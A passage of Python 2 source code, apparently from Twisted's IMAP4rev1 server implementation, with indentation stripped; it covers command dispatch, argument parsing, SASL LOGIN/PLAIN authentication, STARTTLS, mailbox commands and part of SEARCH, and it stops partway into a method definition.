def format(self, tag):
if self.args is None:
return ' '.join((tag, self.command))
return ' '.join((tag, self.command, self.args))
def finish(self, lastLine, unusedCallback):
send = []
unuse = []
for L in self.lines:
names = parseNestedParens(L)
N = len(names)
if (N >= 1 and names[0] in self._1_RESPONSES or
N >= 2 and names[1] in self._2_RESPONSES or
N >= 2 and names[0] == 'OK' and isinstance(names[1], types.ListType) and names[1][0] in self._OK_RESPONSES):
send.append(names)
else:
unuse.append(names)
d, self.defer = self.defer, None
d.callback((send, lastLine))
if unuse:
unusedCallback(unuse)
class LOGINCredentials(cred.credentials.UsernamePassword):
def __init__(self):
self.challenges = ['Password\0', 'User Name\0']
self.responses = ['password', 'username']
cred.credentials.UsernamePassword.__init__(self, None, None)
def getChallenge(self):
return self.challenges.pop()
def setResponse(self, response):
setattr(self, self.responses.pop(), response)
def moreChallenges(self):
return bool(self.challenges)
class PLAINCredentials(cred.credentials.UsernamePassword):
def __init__(self):
cred.credentials.UsernamePassword.__init__(self, None, None)
def getChallenge(self):
return ''
def setResponse(self, response):
parts = response.split('\0')
if len(parts) != 3:
raise IllegalClientResponse("Malformed Response - wrong number of parts")
useless, self.username, self.password = parts
def moreChallenges(self):
return False
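# Editor's sketch (not part of Twisted): a SASL PLAIN response is three
# NUL-separated fields; the authorization identity (first field) is ignored
# here. The credentials below are invented for illustration.
def _examplePlainCredentials():
    creds = PLAINCredentials()
    creds.setResponse('\x00alice\x00sekrit')
    assert creds.username == 'alice' and creds.password == 'sekrit'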
class IMAP4Exception(Exception):
def __init__(self, *args):
Exception.__init__(self, *args)
class IllegalClientResponse(IMAP4Exception): pass
class IllegalOperation(IMAP4Exception): pass
class IllegalMailboxEncoding(IMAP4Exception): pass
class IMailboxListener(Interface):
"""Interface for objects interested in mailbox events"""
def modeChanged(writeable):
"""Indicates that the write status of a mailbox has changed.
@type writeable: C{bool}
@param writeable: A true value if write is now allowed, false
otherwise.
"""
def flagsChanged(newFlags):
"""Indicates that the flags of one or more messages have changed.
@type newFlags: C{dict}
@param newFlags: A mapping of message identifiers to tuples of flags
now set on that message.
"""
def newMessages(exists, recent):
"""Indicates that the number of messages in a mailbox has changed.
@type exists: C{int} or C{None}
@param exists: The total number of messages now in this mailbox.
If the total number of messages has not changed, this should be
C{None}.
@type recent: C{int}
@param recent: The number of messages now flagged \\Recent.
If the number of recent messages has not changed, this should be
C{None}.
"""
class IMAP4Server(basic.LineReceiver, policies.TimeoutMixin):
"""
Protocol implementation for an IMAP4rev1 server.
The server can be in any of four states:
- Non-authenticated
- Authenticated
- Selected
- Logout
"""
implements(IMailboxListener)
# Identifier for this server software
IDENT = 'Twisted IMAP4rev1 Ready'
# Number of seconds before idle timeout
# Initially 1 minute. Raised to 30 minutes after login.
timeOut = 60
POSTAUTH_TIMEOUT = 60 * 30
# Whether STARTTLS has been issued successfully yet or not.
startedTLS = False
# Whether our transport supports TLS
canStartTLS = False
# Mapping of tags to commands we have received
tags = None
# The object which will handle logins for us
portal = None
# The account object for this connection
account = None
# Logout callback
_onLogout = None
# The currently selected mailbox
mbox = None
# Command data to be processed when literal data is received
_pendingLiteral = None
# Maximum length to accept for a "short" string literal
_literalStringLimit = 4096
# IChallengeResponse factories for AUTHENTICATE command
challengers = None
# Search terms whose implementations need to be passed both the last
# message identifier (UID) and the last sequence id.
_requiresLastMessageInfo = set(["OR", "NOT", "UID"])
state = 'unauth'
parseState = 'command'
def __init__(self, chal = None, contextFactory = None, scheduler = None):
if chal is None:
chal = {}
self.challengers = chal
self.ctx = contextFactory
if scheduler is None:
scheduler = iterateInReactor
self._scheduler = scheduler
self._queuedAsync = []
def capabilities(self):
cap = {'AUTH': self.challengers.keys()}
if self.ctx and self.canStartTLS:
if not self.startedTLS and interfaces.ISSLTransport(self.transport, None) is None:
cap['LOGINDISABLED'] = None
cap['STARTTLS'] = None
cap['NAMESPACE'] = None
cap['IDLE'] = None
return cap
def connectionMade(self):
self.tags = {}
self.canStartTLS = interfaces.ITLSTransport(self.transport, None) is not None
self.setTimeout(self.timeOut)
self.sendServerGreeting()
def connectionLost(self, reason):
self.setTimeout(None)
if self._onLogout:
self._onLogout()
self._onLogout = None
def timeoutConnection(self):
self.sendLine('* BYE Autologout; connection idle too long')
self.transport.loseConnection()
if self.mbox:
self.mbox.removeListener(self)
cmbx = ICloseableMailbox(self.mbox, None)
if cmbx is not None:
maybeDeferred(cmbx.close).addErrback(log.err)
self.mbox = None
self.state = 'timeout'
def rawDataReceived(self, data):
self.resetTimeout()
passon = self._pendingLiteral.write(data)
if passon is not None:
self.setLineMode(passon)
# Avoid processing commands while buffers are being dumped to
# our transport
blocked = None
def _unblock(self):
commands = self.blocked
self.blocked = None
while commands and self.blocked is None:
self.lineReceived(commands.pop(0))
if self.blocked is not None:
self.blocked.extend(commands)
def lineReceived(self, line):
if self.blocked is not None:
self.blocked.append(line)
return
self.resetTimeout()
f = getattr(self, 'parse_' + self.parseState)
try:
f(line)
except Exception, e:
self.sendUntaggedResponse('BAD Server error: ' + str(e))
log.err()
def parse_command(self, line):
args = line.split(None, 2)
rest = None
if len(args) == 3:
tag, cmd, rest = args
elif len(args) == 2:
tag, cmd = args
elif len(args) == 1:
tag = args[0]
self.sendBadResponse(tag, 'Missing command')
return None
else:
self.sendBadResponse(None, 'Null command')
return None
cmd = cmd.upper()
try:
return self.dispatchCommand(tag, cmd, rest)
except IllegalClientResponse, e:
self.sendBadResponse(tag, 'Illegal syntax: ' + str(e))
except IllegalOperation, e:
self.sendNegativeResponse(tag, 'Illegal operation: ' + str(e))
except IllegalMailboxEncoding, e:
self.sendNegativeResponse(tag, 'Illegal mailbox name: ' + str(e))
def parse_pending(self, line):
d = self._pendingLiteral
self._pendingLiteral = None
self.parseState = 'command'
d.callback(line)
def dispatchCommand(self, tag, cmd, rest, uid=None):
f = self.lookupCommand(cmd)
if f:
fn = f[0]
parseargs = f[1:]
self.__doCommand(tag, fn, [self, tag], parseargs, rest, uid)
else:
self.sendBadResponse(tag, 'Unsupported command')
def lookupCommand(self, cmd):
return getattr(self, '_'.join((self.state, cmd.upper())), None)
def __doCommand(self, tag, handler, args, parseargs, line, uid):
for (i, arg) in enumerate(parseargs):
if callable(arg):
parseargs = parseargs[i+1:]
maybeDeferred(arg, self, line).addCallback(
self.__cbDispatch, tag, handler, args,
parseargs, uid).addErrback(self.__ebDispatch, tag)
return
else:
args.append(arg)
if line:
# Too many arguments
raise IllegalClientResponse("Too many arguments for command: " + repr(line))
if uid is not None:
handler(uid=uid, *args)
else:
handler(*args)
def __cbDispatch(self, (arg, rest), tag, fn, args, parseargs, uid):
args.append(arg)
self.__doCommand(tag, fn, args, parseargs, rest, uid)
def __ebDispatch(self, failure, tag):
if failure.check(IllegalClientResponse):
self.sendBadResponse(tag, 'Illegal syntax: ' + str(failure.value))
elif failure.check(IllegalOperation):
self.sendNegativeResponse(tag, 'Illegal operation: ' +
str(failure.value))
elif failure.check(IllegalMailboxEncoding):
self.sendNegativeResponse(tag, 'Illegal mailbox name: ' +
str(failure.value))
else:
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
log.err(failure)
def _stringLiteral(self, size):
if size > self._literalStringLimit:
raise IllegalClientResponse(
"Literal too long! I accept at most %d octets" %
(self._literalStringLimit,))
d = defer.Deferred()
self.parseState = 'pending'
self._pendingLiteral = LiteralString(size, d)
self.sendContinuationRequest('Ready for %d octets of text' % size)
self.setRawMode()
return d
def _fileLiteral(self, size):
d = defer.Deferred()
self.parseState = 'pending'
self._pendingLiteral = LiteralFile(size, d)
self.sendContinuationRequest('Ready for %d octets of data' % size)
self.setRawMode()
return d
def arg_astring(self, line):
"""
Parse an astring from the line, return (arg, rest), possibly
via a deferred (to handle literals)
"""
line = line.strip()
if not line:
raise IllegalClientResponse("Missing argument")
d = None
arg, rest = None, None
if line[0] == '"':
try:
spam, arg, rest = line.split('"',2)
rest = rest[1:] # Strip space
except ValueError:
raise IllegalClientResponse("Unmatched quotes")
elif line[0] == '{':
# literal
if line[-1] != '}':
raise IllegalClientResponse("Malformed literal")
try:
size = int(line[1:-1])
except ValueError:
raise IllegalClientResponse("Bad literal size: " + line[1:-1])
d = self._stringLiteral(size)
else:
arg = line.split(' ',1)
if len(arg) == 1:
arg.append('')
arg, rest = arg
return d or (arg, rest)
# ATOM: Any CHAR except ( ) { % * " \ ] CTL SP (CHAR is 7bit)
atomre = re.compile(r'(?P<atom>[^\](){%*"\\\x00-\x20\x80-\xff]+)( (?P<rest>.*$)|$)')
def arg_atom(self, line):
"""
Parse an atom from the line
"""
if not line:
raise IllegalClientResponse("Missing argument")
m = self.atomre.match(line)
if m:
return m.group('atom'), m.group('rest')
else:
raise IllegalClientResponse("Malformed ATOM")
def arg_plist(self, line):
"""
Parse a (non-nested) parenthesised list from the line
"""
if not line:
raise IllegalClientResponse("Missing argument")
if line[0] != "(":
raise IllegalClientResponse("Missing parenthesis")
i = line.find(")")
if i == -1:
raise IllegalClientResponse("Mismatched parenthesis")
return (parseNestedParens(line[1:i],0), line[i+2:])
def arg_literal(self, line):
"""
Parse a literal from the line
"""
if not line:
raise IllegalClientResponse("Missing argument")
if line[0] != '{':
raise IllegalClientResponse("Missing literal")
if line[-1] != '}':
raise IllegalClientResponse("Malformed literal")
try:
size = int(line[1:-1])
except ValueError:
raise IllegalClientResponse("Bad literal size: " + line[1:-1])
return self._fileLiteral(size)
def arg_searchkeys(self, line):
"""
searchkeys
"""
query = parseNestedParens(line)
# XXX Should really use list of search terms and parse into
# a proper tree
return (query, '')
def arg_seqset(self, line):
"""
sequence-set
"""
rest = ''
arg = line.split(' ',1)
if len(arg) == 2:
rest = arg[1]
arg = arg[0]
try:
return (parseIdList(arg), rest)
except IllegalIdentifierError, e:
raise IllegalClientResponse("Bad message number " + str(e))
def arg_fetchatt(self, line):
"""
fetch-att
"""
p = _FetchParser()
p.parseString(line)
return (p.result, '')
def arg_flaglist(self, line):
"""
Flag part of store-att-flag
"""
flags = []
if line[0] == '(':
if line[-1] != ')':
raise IllegalClientResponse("Mismatched parenthesis")
line = line[1:-1]
while line:
m = self.atomre.search(line)
if not m:
raise IllegalClientResponse("Malformed flag")
if line[0] == '\\' and m.start() == 1:
flags.append('\\' + m.group('atom'))
elif m.start() == 0:
flags.append(m.group('atom'))
else:
raise IllegalClientResponse("Malformed flag")
line = m.group('rest')
return (flags, '')
def arg_line(self, line):
"""
Command line of UID command
"""
return (line, '')
def opt_plist(self, line):
"""
Optional parenthesised list
"""
if line.startswith('('):
return self.arg_plist(line)
else:
return (None, line)
def opt_datetime(self, line):
"""
Optional date-time string
"""
if line.startswith('"'):
try:
spam, date, rest = line.split('"',2)
except IndexError:
raise IllegalClientResponse("Malformed date-time")
return (date, rest[1:])
else:
return (None, line)
def opt_charset(self, line):
"""
Optional charset of SEARCH command
"""
if line[:7].upper() == 'CHARSET':
arg = line.split(' ',2)
if len(arg) == 1:
raise IllegalClientResponse("Missing charset identifier")
if len(arg) == 2:
arg.append('')
spam, arg, rest = arg
return (arg, rest)
else:
return (None, line)
def sendServerGreeting(self):
msg = '[CAPABILITY %s] %s' % (' '.join(self.listCapabilities()), self.IDENT)
self.sendPositiveResponse(message=msg)
def sendBadResponse(self, tag = None, message = ''):
self._respond('BAD', tag, message)
def sendPositiveResponse(self, tag = None, message = ''):
self._respond('OK', tag, message)
def sendNegativeResponse(self, tag = None, message = ''):
self._respond('NO', tag, message)
def sendUntaggedResponse(self, message, async=False):
if not async or (self.blocked is None):
self._respond(message, None, None)
else:
self._queuedAsync.append(message)
def sendContinuationRequest(self, msg = 'Ready for additional command text'):
if msg:
self.sendLine('+ ' + msg)
else:
self.sendLine('+')
def _respond(self, state, tag, message):
if state in ('OK', 'NO', 'BAD') and self._queuedAsync:
lines = self._queuedAsync
self._queuedAsync = []
for msg in lines:
self._respond(msg, None, None)
if not tag:
tag = '*'
if message:
self.sendLine(' '.join((tag, state, message)))
else:
self.sendLine(' '.join((tag, state)))
def listCapabilities(self):
caps = ['IMAP4rev1']
for c, v in self.capabilities().iteritems():
if v is None:
caps.append(c)
elif len(v):
caps.extend([('%s=%s' % (c, cap)) for cap in v])
return caps
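# Illustrative sketch (comment only): with capabilities() returning,
# say, {'IDLE': None, 'AUTH': ['LOGIN', 'PLAIN']}, this would yield
# 'IMAP4rev1' plus 'IDLE', 'AUTH=LOGIN' and 'AUTH=PLAIN' (in dict
# iteration order) -- the payload of the CAPABILITY response.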
def do_CAPABILITY(self, tag):
self.sendUntaggedResponse('CAPABILITY ' + ' '.join(self.listCapabilities()))
self.sendPositiveResponse(tag, 'CAPABILITY completed')
unauth_CAPABILITY = (do_CAPABILITY,)
auth_CAPABILITY = unauth_CAPABILITY
select_CAPABILITY = unauth_CAPABILITY
logout_CAPABILITY = unauth_CAPABILITY
def do_LOGOUT(self, tag):
self.sendUntaggedResponse('BYE Nice talking to you')
self.sendPositiveResponse(tag, 'LOGOUT successful')
self.transport.loseConnection()
unauth_LOGOUT = (do_LOGOUT,)
auth_LOGOUT = unauth_LOGOUT
select_LOGOUT = unauth_LOGOUT
logout_LOGOUT = unauth_LOGOUT
def do_NOOP(self, tag):
self.sendPositiveResponse(tag, 'NOOP No operation performed')
unauth_NOOP = (do_NOOP,)
auth_NOOP = unauth_NOOP
select_NOOP = unauth_NOOP
logout_NOOP = unauth_NOOP
def do_AUTHENTICATE(self, tag, args):
args = args.upper().strip()
if args not in self.challengers:
self.sendNegativeResponse(tag, 'AUTHENTICATE method unsupported')
else:
self.authenticate(self.challengers[args](), tag)
unauth_AUTHENTICATE = (do_AUTHENTICATE, arg_atom)
def authenticate(self, chal, tag):
if self.portal is None:
self.sendNegativeResponse(tag, 'Temporary authentication failure')
return
self._setupChallenge(chal, tag)
def _setupChallenge(self, chal, tag):
try:
challenge = chal.getChallenge()
except Exception, e:
self.sendBadResponse(tag, 'Server error: ' + str(e))
else:
coded = base64.encodestring(challenge)[:-1]
self.parseState = 'pending'
self._pendingLiteral = defer.Deferred()
self.sendContinuationRequest(coded)
self._pendingLiteral.addCallback(self.__cbAuthChunk, chal, tag)
self._pendingLiteral.addErrback(self.__ebAuthChunk, tag)
def __cbAuthChunk(self, result, chal, tag):
try:
uncoded = base64.decodestring(result)
except binascii.Error:
raise IllegalClientResponse("Malformed Response - not base64")
chal.setResponse(uncoded)
if chal.moreChallenges():
self._setupChallenge(chal, tag)
else:
self.portal.login(chal, None, IAccount).addCallbacks(
self.__cbAuthResp,
self.__ebAuthResp,
(tag,), None, (tag,), None
)
def __cbAuthResp(self, (iface, avatar, logout), tag):
assert iface is IAccount, "IAccount is the only supported interface"
self.account = avatar
self.state = 'auth'
self._onLogout = logout
self.sendPositiveResponse(tag, 'Authentication successful')
self.setTimeout(self.POSTAUTH_TIMEOUT)
def __ebAuthResp(self, failure, tag):
if failure.check(cred.error.UnauthorizedLogin):
self.sendNegativeResponse(tag, 'Authentication failed: unauthorized')
elif failure.check(cred.error.UnhandledCredentials):
self.sendNegativeResponse(tag, 'Authentication failed: server misconfigured')
else:
self.sendBadResponse(tag, 'Server error: login failed unexpectedly')
log.err(failure)
def __ebAuthChunk(self, failure, tag):
self.sendNegativeResponse(tag, 'Authentication failed: ' + str(failure.value))
def do_STARTTLS(self, tag):
if self.startedTLS:
self.sendNegativeResponse(tag, 'TLS already negotiated')
elif self.ctx and self.canStartTLS:
self.sendPositiveResponse(tag, 'Begin TLS negotiation now')
self.transport.startTLS(self.ctx)
self.startedTLS = True
self.challengers = self.challengers.copy()
if 'LOGIN' not in self.challengers:
self.challengers['LOGIN'] = LOGINCredentials
if 'PLAIN' not in self.challengers:
self.challengers['PLAIN'] = PLAINCredentials
else:
self.sendNegativeResponse(tag, 'TLS not available')
unauth_STARTTLS = (do_STARTTLS,)
def do_LOGIN(self, tag, user, passwd):
if 'LOGINDISABLED' in self.capabilities():
self.sendBadResponse(tag, 'LOGIN is disabled before STARTTLS')
return
maybeDeferred(self.authenticateLogin, user, passwd
).addCallback(self.__cbLogin, tag
).addErrback(self.__ebLogin, tag
)
unauth_LOGIN = (do_LOGIN, arg_astring, arg_astring)
def authenticateLogin(self, user, passwd):
"""Lookup the account associated with the given parameters
Override this method to define the desired authentication behavior.
The default behavior is to defer authentication to C{self.portal}
if it is not None, or to deny the login otherwise.
@type user: C{str}
@param user: The username to lookup
@type passwd: C{str}
@param passwd: The password to login with
"""
if self.portal:
return self.portal.login(
cred.credentials.UsernamePassword(user, passwd),
None, IAccount
)
raise cred.error.UnauthorizedLogin()
def __cbLogin(self, (iface, avatar, logout), tag):
if iface is not IAccount:
self.sendBadResponse(tag, 'Server error: login returned unexpected value')
log.err("__cbLogin called with %r, IAccount expected" % (iface,))
else:
self.account = avatar
self._onLogout = logout
self.sendPositiveResponse(tag, 'LOGIN succeeded')
self.state = 'auth'
self.setTimeout(self.POSTAUTH_TIMEOUT)
def __ebLogin(self, failure, tag):
if failure.check(cred.error.UnauthorizedLogin):
self.sendNegativeResponse(tag, 'LOGIN failed')
else:
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
log.err(failure)
def do_NAMESPACE(self, tag):
personal = public = shared = None
np = INamespacePresenter(self.account, None)
if np is not None:
# RFC 2342 NAMESPACE response order: personal, other users', shared.
personal = np.getPersonalNamespaces()
public = np.getUserNamespaces()
shared = np.getSharedNamespaces()
self.sendUntaggedResponse('NAMESPACE ' + collapseNestedLists([personal, public, shared]))
self.sendPositiveResponse(tag, "NAMESPACE command completed")
auth_NAMESPACE = (do_NAMESPACE,)
select_NAMESPACE = auth_NAMESPACE
def _parseMbox(self, name):
if isinstance(name, unicode):
return name
try:
return name.decode('imap4-utf-7')
except:
log.err()
raise IllegalMailboxEncoding(name)
def _selectWork(self, tag, name, rw, cmdName):
if self.mbox:
self.mbox.removeListener(self)
cmbx = ICloseableMailbox(self.mbox, None)
if cmbx is not None:
maybeDeferred(cmbx.close).addErrback(log.err)
self.mbox = None
self.state = 'auth'
name = self._parseMbox(name)
maybeDeferred(self.account.select, self._parseMbox(name), rw
).addCallback(self._cbSelectWork, cmdName, tag
).addErrback(self._ebSelectWork, cmdName, tag
)
def _ebSelectWork(self, failure, cmdName, tag):
self.sendBadResponse(tag, "%s failed: Server error" % (cmdName,))
log.err(failure)
def _cbSelectWork(self, mbox, cmdName, tag):
if mbox is None:
self.sendNegativeResponse(tag, 'No such mailbox')
return
if '\\noselect' in [s.lower() for s in mbox.getFlags()]:
self.sendNegativeResponse(tag, 'Mailbox cannot be selected')
return
flags = mbox.getFlags()
self.sendUntaggedResponse(str(mbox.getMessageCount()) + ' EXISTS')
self.sendUntaggedResponse(str(mbox.getRecentCount()) + ' RECENT')
self.sendUntaggedResponse('FLAGS (%s)' % ' '.join(flags))
self.sendPositiveResponse(None, '[UIDVALIDITY %d]' % mbox.getUIDValidity())
s = mbox.isWriteable() and 'READ-WRITE' or 'READ-ONLY'
mbox.addListener(self)
self.sendPositiveResponse(tag, '[%s] %s successful' % (s, cmdName))
self.state = 'select'
self.mbox = mbox
auth_SELECT = ( _selectWork, arg_astring, 1, 'SELECT' )
select_SELECT = auth_SELECT
auth_EXAMINE = ( _selectWork, arg_astring, 0, 'EXAMINE' )
select_EXAMINE = auth_EXAMINE
def do_IDLE(self, tag):
self.sendContinuationRequest(None)
self.parseTag = tag
self.lastState = self.parseState
self.parseState = 'idle'
def parse_idle(self, *args):
self.parseState = self.lastState
del self.lastState
self.sendPositiveResponse(self.parseTag, "IDLE terminated")
del self.parseTag
select_IDLE = ( do_IDLE, )
auth_IDLE = select_IDLE
def do_CREATE(self, tag, name):
name = self._parseMbox(name)
try:
result = self.account.create(name)
except MailboxException, c:
self.sendNegativeResponse(tag, str(c))
except:
self.sendBadResponse(tag, "Server error encountered while creating mailbox")
log.err()
else:
if result:
self.sendPositiveResponse(tag, 'Mailbox created')
else:
self.sendNegativeResponse(tag, 'Mailbox not created')
auth_CREATE = (do_CREATE, arg_astring)
select_CREATE = auth_CREATE
def do_DELETE(self, tag, name):
name = self._parseMbox(name)
if name.lower() == 'inbox':
self.sendNegativeResponse(tag, 'You cannot delete the inbox')
return
try:
self.account.delete(name)
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while deleting mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Mailbox deleted')
auth_DELETE = (do_DELETE, arg_astring)
select_DELETE = auth_DELETE
def do_RENAME(self, tag, oldname, newname):
oldname, newname = [self._parseMbox(n) for n in (oldname, newname)]
if oldname.lower() == 'inbox' or newname.lower() == 'inbox':
self.sendNegativeResponse(tag, 'You cannot rename the inbox, or rename another mailbox to inbox.')
return
try:
self.account.rename(oldname, newname)
except TypeError:
self.sendBadResponse(tag, 'Invalid command syntax')
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while renaming mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Mailbox renamed')
auth_RENAME = (do_RENAME, arg_astring, arg_astring)
select_RENAME = auth_RENAME
def do_SUBSCRIBE(self, tag, name):
name = self._parseMbox(name)
try:
self.account.subscribe(name)
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while subscribing to mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Subscribed')
auth_SUBSCRIBE = (do_SUBSCRIBE, arg_astring)
select_SUBSCRIBE = auth_SUBSCRIBE
def do_UNSUBSCRIBE(self, tag, name):
name = self._parseMbox(name)
try:
self.account.unsubscribe(name)
except MailboxException, m:
self.sendNegativeResponse(tag, str(m))
except:
self.sendBadResponse(tag, "Server error encountered while unsubscribing from mailbox")
log.err()
else:
self.sendPositiveResponse(tag, 'Unsubscribed')
auth_UNSUBSCRIBE = (do_UNSUBSCRIBE, arg_astring)
select_UNSUBSCRIBE = auth_UNSUBSCRIBE
def _listWork(self, tag, ref, mbox, sub, cmdName):
mbox = self._parseMbox(mbox)
maybeDeferred(self.account.listMailboxes, ref, mbox
).addCallback(self._cbListWork, tag, sub, cmdName
).addErrback(self._ebListWork, tag
)
def _cbListWork(self, mailboxes, tag, sub, cmdName):
for (name, box) in mailboxes:
if not sub or self.account.isSubscribed(name):
flags = box.getFlags()
delim = box.getHierarchicalDelimiter()
resp = (DontQuoteMe(cmdName), map(DontQuoteMe, flags), delim, name.encode('imap4-utf-7'))
self.sendUntaggedResponse(collapseNestedLists(resp))
self.sendPositiveResponse(tag, '%s completed' % (cmdName,))
def _ebListWork(self, failure, tag):
self.sendBadResponse(tag, "Server error encountered while listing mailboxes.")
log.err(failure)
auth_LIST = (_listWork, arg_astring, arg_astring, 0, 'LIST')
select_LIST = auth_LIST
auth_LSUB = (_listWork, arg_astring, arg_astring, 1, 'LSUB')
select_LSUB = auth_LSUB
def do_STATUS(self, tag, mailbox, names):
mailbox = self._parseMbox(mailbox)
maybeDeferred(self.account.select, mailbox, 0
).addCallback(self._cbStatusGotMailbox, tag, mailbox, names
).addErrback(self._ebStatusGotMailbox, tag
)
def _cbStatusGotMailbox(self, mbox, tag, mailbox, names):
if mbox:
maybeDeferred(mbox.requestStatus, names).addCallbacks(
self.__cbStatus, self.__ebStatus,
(tag, mailbox), None, (tag, mailbox), None
)
else:
self.sendNegativeResponse(tag, "Could not open mailbox")
def _ebStatusGotMailbox(self, failure, tag):
self.sendBadResponse(tag, "Server error encountered while opening mailbox.")
log.err(failure)
auth_STATUS = (do_STATUS, arg_astring, arg_plist)
select_STATUS = auth_STATUS
def __cbStatus(self, status, tag, box):
line = ' '.join(['%s %s' % x for x in status.iteritems()])
self.sendUntaggedResponse('STATUS %s (%s)' % (box, line))
self.sendPositiveResponse(tag, 'STATUS complete')
def __ebStatus(self, failure, tag, box):
self.sendBadResponse(tag, 'STATUS %s failed: %s' % (box, str(failure.value)))
def do_APPEND(self, tag, mailbox, flags, date, message):
mailbox = self._parseMbox(mailbox)
maybeDeferred(self.account.select, mailbox
).addCallback(self._cbAppendGotMailbox, tag, flags, date, message
).addErrback(self._ebAppendGotMailbox, tag
)
def _cbAppendGotMailbox(self, mbox, tag, flags, date, message):
if not mbox:
self.sendNegativeResponse(tag, '[TRYCREATE] No such mailbox')
return
d = mbox.addMessage(message, flags, date)
d.addCallback(self.__cbAppend, tag, mbox)
d.addErrback(self.__ebAppend, tag)
def _ebAppendGotMailbox(self, failure, tag):
self.sendBadResponse(tag, "Server error encountered while opening mailbox.")
log.err(failure)
auth_APPEND = (do_APPEND, arg_astring, opt_plist, opt_datetime,
arg_literal)
select_APPEND = auth_APPEND
def __cbAppend(self, result, tag, mbox):
self.sendUntaggedResponse('%d EXISTS' % mbox.getMessageCount())
self.sendPositiveResponse(tag, 'APPEND complete')
def __ebAppend(self, failure, tag):
self.sendBadResponse(tag, 'APPEND failed: ' + str(failure.value))
def do_CHECK(self, tag):
d = self.checkpoint()
if d is None:
self.__cbCheck(None, tag)
else:
d.addCallbacks(
self.__cbCheck,
self.__ebCheck,
callbackArgs=(tag,),
errbackArgs=(tag,)
)
select_CHECK = (do_CHECK,)
def __cbCheck(self, result, tag):
self.sendPositiveResponse(tag, 'CHECK completed')
def __ebCheck(self, failure, tag):
self.sendBadResponse(tag, 'CHECK failed: ' + str(failure.value))
def checkpoint(self):
"""Called when the client issues a CHECK command.
This should perform any checkpoint operations required by the server.
It may be a long-running operation, but it may not block. If it returns
a deferred, the client will only be informed of success (or failure)
when the deferred's callback (or errback) is invoked.
"""
return None
def do_CLOSE(self, tag):
d = None
if self.mbox.isWriteable():
d = maybeDeferred(self.mbox.expunge)
cmbx = ICloseableMailbox(self.mbox, None)
if cmbx is not None:
if d is not None:
d.addCallback(lambda result: cmbx.close())
else:
d = maybeDeferred(cmbx.close)
if d is not None:
d.addCallbacks(self.__cbClose, self.__ebClose, (tag,), None, (tag,), None)
else:
self.__cbClose(None, tag)
select_CLOSE = (do_CLOSE,)
def __cbClose(self, result, tag):
self.sendPositiveResponse(tag, 'CLOSE completed')
self.mbox.removeListener(self)
self.mbox = None
self.state = 'auth'
def __ebClose(self, failure, tag):
self.sendBadResponse(tag, 'CLOSE failed: ' + str(failure.value))
def do_EXPUNGE(self, tag):
if self.mbox.isWriteable():
maybeDeferred(self.mbox.expunge).addCallbacks(
self.__cbExpunge, self.__ebExpunge, (tag,), None, (tag,), None
)
else:
self.sendNegativeResponse(tag, 'EXPUNGE ignored on read-only mailbox')
select_EXPUNGE = (do_EXPUNGE,)
def __cbExpunge(self, result, tag):
for e in result:
self.sendUntaggedResponse('%d EXPUNGE' % e)
self.sendPositiveResponse(tag, 'EXPUNGE completed')
def __ebExpunge(self, failure, tag):
self.sendBadResponse(tag, 'EXPUNGE failed: ' + str(failure.value))
log.err(failure)
def do_SEARCH(self, tag, charset, query, uid=0):
sm = ISearchableMailbox(self.mbox, None)
if sm is not None:
maybeDeferred(sm.search, query, uid=uid).addCallbacks(
self.__cbSearch, self.__ebSearch,
(tag, self.mbox, uid), None, (tag,), None
)
else:
# This is not the ideal way to get all messages; there should be a
# method on mailboxes that returns all of them.
s = parseIdList('1:*')
maybeDeferred(self.mbox.fetch, s, uid=uid).addCallbacks(
self.__cbManualSearch, self.__ebSearch,
(tag, self.mbox, query, uid), None, (tag,), None
)
select_SEARCH = (do_SEARCH, opt_charset, arg_searchkeys)
def __cbSearch(self, result, tag, mbox, uid):
if uid:
result = map(mbox.getUID, result)
ids = ' '.join([str(i) for i in result])
self.sendUntaggedResponse('SEARCH ' + ids)
self.sendPositiveResponse(tag, 'SEARCH completed')
def __cbManualSearch(self, result, tag, mbox, query, uid,
searchResults=None):
"""
Apply the search filter to a set of messages. Send the response to the
client.
@type result: C{list} of C{tuple} of (C{int}, provider of
L{imap4.IMessage})
@param result: A list of two-tuples of messages with their sequence ids,
sorted by the ids in descending order.
@type tag: C{str}
@param tag: A command tag.
@type mbox: Provider of L{imap4.IMailbox}
@param mbox: The searched mailbox.
@type query: C{list}
@param query: A list representing the parsed form of the search query.
@param uid: A flag indicating whether the search is over message
sequence numbers or UIDs.
@type searchResults: C{list}
@param searchResults: The search results so far or C{None} if no
results yet.
"""
if searchResults is None:
searchResults = []
i = 0
# result is a list of tuples (sequenceId, Message)
lastSequenceId = result and result[-1][0]
lastMessageId = result and result[-1][1].getUID()
for (i, (id, msg)) in zip(range(5), result):
# searchFilter and singleSearchStep will mutate the query. Dang.
# Copy it here or else things will go poorly for subsequent
# messages.
if self._searchFilter(copy.deepcopy(query), id, msg,
lastSequenceId, lastMessageId):
if uid:
searchResults.append(str(msg.getUID()))
else:
searchResults.append(str(id))
if i == 4:
from twisted.internet import reactor
reactor.callLater(
0, self.__cbManualSearch, result[5:], tag, mbox, query, uid,
searchResults)
else:
if searchResults:
self.sendUntaggedResponse('SEARCH ' + ' '.join(searchResults))
self.sendPositiveResponse(tag, 'SEARCH completed')
def _searchFilter(self, query, id, msg, lastSequenceId, lastMessageId):
"""
Pop search terms from the beginning of C{query} until there are none
left and apply them to the given message.
@param query: A list representing the parsed form of the search query.
@param id: The sequence number of the message being checked.
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of any message in
the mailbox being searched.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of any message in the mailbox
being searched.
@return: Boolean indicating whether all of the query terms match the
message.
"""
while query:
if not self._singleSearchStep(query, id, msg,
lastSequenceId, lastMessageId):
return False
return True
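# Illustrative sketch (comment only): a parsed query such as
# ['FLAGGED', 'SINCE', '1-Feb-2003'] is consumed term by term here;
# each _singleSearchStep call pops 'FLAGGED', then 'SINCE' together
# with its date argument, and the message matches only if every
# step returns a true value.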
def _singleSearchStep(self, query, id, msg, lastSequenceId, lastMessageId):
